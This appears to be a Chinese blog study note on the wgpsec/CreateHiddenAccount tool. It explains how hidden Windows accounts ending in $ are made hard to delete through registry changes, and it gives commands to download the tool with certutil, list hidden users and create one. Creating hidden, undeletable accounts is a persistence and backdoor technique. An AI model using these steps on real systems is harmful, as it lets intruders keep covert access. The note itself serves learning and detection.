【笔记】CreateHiddenAccount学习笔记

发表于 更新于 阅读次数:

前言

通过wgpsec/CreateHiddenAccount实现查看和创建Windows隐藏用户

隐藏用户的用户名以$作为后缀,不会在net user中显示,但是可以在用户和计算机管理中查看
如果使用net user <username>$ <password> /add命令创建的隐藏用户,在域控和工作组中都可以被删除,如果使用wgpsec/CreateHiddenAccount创建的隐藏用户,可以在域控上被删除,但无法在工作组中被删除,原因是在创建隐藏用户后,还在注册表中进行了配置,将该用户隶属于设置为空,导致没有任何组可以删除这个用户

下载项目

1
certutil -urlcache -split -f "https://github.com/wgpsec/CreateHiddenAccount/releases/download/0.2/CreateHiddenAccount_v0.2.exe"

查看所有隐藏用户

1
.\CreateHiddenAccount_v0.2.exe -c

创建隐藏用户

-u <username>:指定用户名,用户名如果没有$后缀则会自动添加$后缀
-p <password>:指定密码

1
.\CreateHiddenAccount_v0.2.exe -u <username> -p <password>

完成